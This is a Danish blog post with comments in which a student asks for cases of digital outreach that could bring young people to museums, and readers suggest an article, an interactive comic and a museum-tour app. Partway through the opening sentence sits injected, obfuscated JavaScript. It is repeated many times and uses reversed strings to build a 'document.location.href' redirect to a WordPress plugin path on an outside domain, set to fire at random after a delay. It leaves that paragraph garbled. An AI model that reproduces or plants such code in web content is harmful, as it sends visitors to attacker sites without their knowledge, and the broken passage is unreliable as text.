Hvilke digitale tiltag kan få de unge, der er vokset op med internet og mobiltelefoner til at komme på museum?
I den nyeste brugerundersøgelse er de unge stadig den mindst repræsenterede brugergruppe på museerne. Kan de digitale medier ikke netoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top være midlet til at tiltrække denne generation?
Jeg er i gang med et speciale om emnet og søger cases fra den virkelige danske museale verden om digitale onsite- og onlineformidlingstiltag til denne målgruppe. Holdninger og andre inputs modtages også gerne 🙂
En interessant artikel som du nok kan bruge til dit speciale: ‘Kan digitale medier og teknologi få unge til at gå på museum?’ af Nanna Holdgaard & Cecilia Simonsen i tidsskriftet ‘Danske Museer’, nr. 1., februar 2010.
På baggrund af fokusgruppeinterviews har forfatterne af denne artikel netop fokus på, om digitale medier og teknologi vil kunne få unge til at gå på museum….
Odense Bys Museer lancerer et nyt digitalt læremiddel i form af en interaktiv tegneserie inden næste skoleår, dvs snart.
Du er mere end velkommen til at gøre en case ud af det og lave nogle undersøgelser i samarbejde med de første klasser der bider på. Læremidlet er tilrettelagt for ~9. klassetrin og honorere fælles mål / trinmål inden for historie og kristendomskundskab.
“Tro, mord og kærlighed”, hedder det.
Du siger bare til hvis det lyder interessant.
Jacob Wang
IT-udvikling
Odense Bys Museer
Fang mig på jrw[a]odense[.]dk 🙂
Og så iøvrigt.
Jeg har ikke megen tiltro til digitale medier som “magnet” i sig selv.
It’s the message, not the media… – er det ikke sådan man siger 😉
Jeg er meget enig med Jacob, og tvivler på at muligheden for fx at anvende sin telefon i en udstilling i sig selv kan gøre besøg onsite interessant.
Men jeg har ofte tænkt på, hvad der sker, hvis man prøvede at vende spørgsmålet om. Dvs. hvad der sker, når/hvis man afskærer “the amplified individual” fra at bruge de kanaler til viden, engagement etc. som vedkommende finder naturlige, og ellers anvender i dagligdagen.
Hej Nina,
Du havde lagt en kommentar med et link til en superinteressant site, hvor man kunne lave sine egne “ture” til museer m.m. for iPhone … men nu er linket her ikke mere?
Jeg fik ikke mærket det, og det var en site jeg ikke kendte – kunne du evt. lægge det igen?
Det så rigtigt spændende ud, ikke mindst fordi den rammer ned i noget jeg gennem længere tid har spekuleret lidt over dette med, at vi i den fremtid, som allerede er her, vil se masser af kontekstualiseringer af kulturarv fra alle mulige interessenter til brug også i de museale rum. (Fx billedgenkendelses-apps m.m. til mobile devices). Den site du havde lagt så meget spændende ud…. ? 🙂
Tak for alle jeres kommentarer. Jeg vil straks bestille artiklen, og tak for dit tilbud Jakob. Jeg er nok lidt for langt i specialet nu, men det lyder meget interessant!
Jeg er helt enig i jeres holdninger om, at det ikke er selve mobilen, der får de unge på museum, men når de kommer, tror jeg, at deres besøg ville kunne blive mere lærerigt og up to date med deres forventninger. Det kunne dog være interessant med en undersøgelse af de unges holdninger til museer og hvad de kunne ønske sig af museerne i fremtiden – de er jo trods alt fremtidens brugere. Men det er desværre for stort ifht omfanget af mit speciale.
Jeg prøver at linke igen: http://www.musetrek.com – musetrek er en mobilapplikation til museer, hvor brugerne bl.a. selv kan skabe ruter, som andre brugere så kan se og afprøve.
Pingback: Lav din egen brugergenererede museumstur til iPhone « Charlotte S H Jensen
Hej Nina
Jeg er en studerende, der står og skal lave et projekt med en del ligheder til dit, derfor var jeg nysgerrig om du var færdig med dit speciale, og om man evt. måtte læse det.
Vh. Stine